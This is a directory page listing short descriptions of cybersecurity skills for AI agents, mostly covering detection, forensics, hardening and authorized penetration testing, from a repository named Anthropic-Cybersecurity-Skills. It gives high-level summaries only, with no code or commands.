ReddRadar
Topic: penetration-testing
850 skills in this topic.
-
analyzing-active-directory-acl-abuse
Detect dangerous ACL misconfigurations in Active Directory using ldap3 to identify GenericAll, WriteDACL, and WriteOwner abuse paths
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
performing-dark-web-monitoring-for-threats
Dark web monitoring involves systematically scanning Tor hidden services, underground forums, paste sites, and dark web marketplaces to identify threats targeting an organization, including leaked cre
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
hunting-for-anomalous-powershell-execution
Hunt for malicious PowerShell activity by analyzing Script Block Logging (Event 4104), Module Logging (Event 4103), and process creation events. The analyst parses Windows Event Log EVTX files to detect obfuscated commands, AMSI bypass attempts, encoded payloads, credential dumping keywords, and suspicious download cradles. Activates for requests involving PowerShell threat hunting, script block analysis, encoded command detection, or AMSI bypass identification.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
implementing-passwordless-auth-with-microsoft-entra
Implements passwordless authentication using Microsoft Entra ID with FIDO2 security keys, Windows Hello for Business, Microsoft Authenticator passkeys, and certificate-based authentication to eliminate password-based attacks. Activates for requests involving passwordless deployment, FIDO2 passkey configuration, phishing-resistant MFA, or Microsoft Entra authentication method policies.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
performing-second-order-sql-injection
Detect and exploit second-order SQL injection vulnerabilities where malicious input is stored in a database and later executed in an unsafe SQL query during a different application operation.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
detecting-service-account-abuse
Detect abuse of service accounts through anomalous interactive logons, privilege escalation, lateral movement, and unauthorized access patterns.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
testing-api-for-broken-object-level-authorization
Tests REST and GraphQL APIs for Broken Object Level Authorization (BOLA/IDOR) vulnerabilities where an authenticated user can access or modify resources belonging to other users by manipulating object identifiers in API requests. The tester intercepts API calls, identifies object ID parameters (numeric IDs, UUIDs, slugs), and systematically replaces them with IDs belonging to other users to determine if the server enforces per-object authorization. This is OWASP API Security Top 10 2023 risk API1. Activates for requests involving BOLA testing, IDOR in APIs, object-level authorization testing, or API access control bypass.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
detecting-aws-credential-exposure-with-trufflehog
Detecting exposed AWS credentials in source code repositories, CI/CD pipelines, and configuration files using TruffleHog, git-secrets, and AWS-native detection mechanisms to prevent credential theft and unauthorized account access.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
performing-kubernetes-etcd-security-assessment
Assess the security posture of Kubernetes etcd clusters by evaluating encryption at rest, TLS configuration, access controls, backup encryption, and network isolation.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
detecting-insider-threat-with-ueba
Implement User and Entity Behavior Analytics using Elasticsearch/OpenSearch to build behavioral baselines, calculate anomaly scores, perform peer group analysis, and detect insider threat indicators such as data exfiltration, privilege abuse, and unauthorized access patterns.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
performing-cloud-penetration-testing-with-pacu
Performing authorized AWS penetration testing using Pacu, the open-source AWS exploitation framework, to enumerate IAM configurations, discover privilege escalation paths, test credential harvesting, and validate security controls through systematic attack simulation.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
performing-docker-bench-security-assessment
Docker Bench for Security is an open-source script that checks dozens of common best practices around deploying Docker containers in production. Based on the CIS Docker Benchmark, it audits host confi
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
performing-firmware-extraction-with-binwalk
Performs firmware image extraction and analysis using binwalk to identify embedded filesystems, compressed archives, bootloaders, kernel images, and cryptographic material. Covers entropy analysis for detecting encrypted or compressed regions, recursive extraction of nested archives, SquashFS/CramFS/JFFS2 filesystem mounting, and string analysis for credential and configuration discovery. Activates for requests involving firmware reverse engineering, IoT device analysis, embedded system security assessment, or router/camera firmware extraction.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-ransomware-network-indicators
Identify ransomware network indicators including C2 beaconing patterns, TOR exit node connections, data exfiltration flows, and encryption key exchange via Zeek conn.log and NetFlow analysis
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
deploying-cloudflare-access-for-zero-trust
Deploying Cloudflare Access with Cloudflare Tunnel to provide zero trust access to self-hosted and private applications, configuring identity-aware access policies, device posture checks, and WARP client enrollment for VPN replacement.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-windows-lnk-files-for-artifacts
Parse Windows LNK shortcut files to extract target paths, timestamps, volume information, and machine identifiers for forensic timeline reconstruction.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
detecting-qr-code-phishing-with-email-security
Detect and prevent QR code phishing (quishing) attacks that bypass traditional email security by embedding malicious URLs in QR code images within emails.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
detecting-process-injection-techniques
Detects and analyzes process injection techniques used by malware including classic DLL injection, process hollowing, APC injection, thread hijacking, and reflective loading. Uses memory forensics, API monitoring, and behavioral analysis to identify injection artifacts. Activates for requests involving process injection detection, code injection analysis, hollowed process investigation, or in-memory threat detection.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
implementing-container-image-minimal-base-with-distroless
Reduce container attack surface by building application images on Google distroless base images that contain only the application runtime with no shell, package manager, or unnecessary OS utilities.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-linux-elf-malware
Analyzes malicious Linux ELF (Executable and Linkable Format) binaries including botnets, cryptominers, ransomware, and rootkits targeting Linux servers, containers, and cloud infrastructure. Covers static analysis, dynamic tracing, and reverse engineering of x86_64 and ARM ELF samples. Activates for requests involving Linux malware analysis, ELF binary investigation, Linux server compromise assessment, or container malware analysis.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
detecting-cryptomining-in-cloud
This skill teaches security teams how to detect and respond to unauthorized cryptocurrency mining operations in cloud environments. It covers identifying cryptomining indicators through compute usage anomalies, network traffic patterns to mining pools, GuardDuty CryptoCurrency findings, and runtime process monitoring on EC2, ECS, EKS, and Azure Automation workloads.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
extracting-windows-event-logs-artifacts
Extract, parse, and analyze Windows Event Logs (EVTX) using Chainsaw, Hayabusa, and EvtxECmd to detect lateral movement, persistence, and privilege escalation.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
detecting-suspicious-oauth-application-consent
Detect risky OAuth application consent grants in Azure AD / Microsoft Entra ID using Microsoft Graph API, audit logs, and permission analysis to identify illicit consent grant attacks.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
hunting-for-unusual-service-installations
Detect suspicious Windows service installations (MITRE ATT&CK T1543.003) by parsing System event logs for Event ID 7045, analyzing service binary paths, and identifying indicators of persistence mechanisms.
mukul975/Anthropic-Cybersecurity-Skills 4,300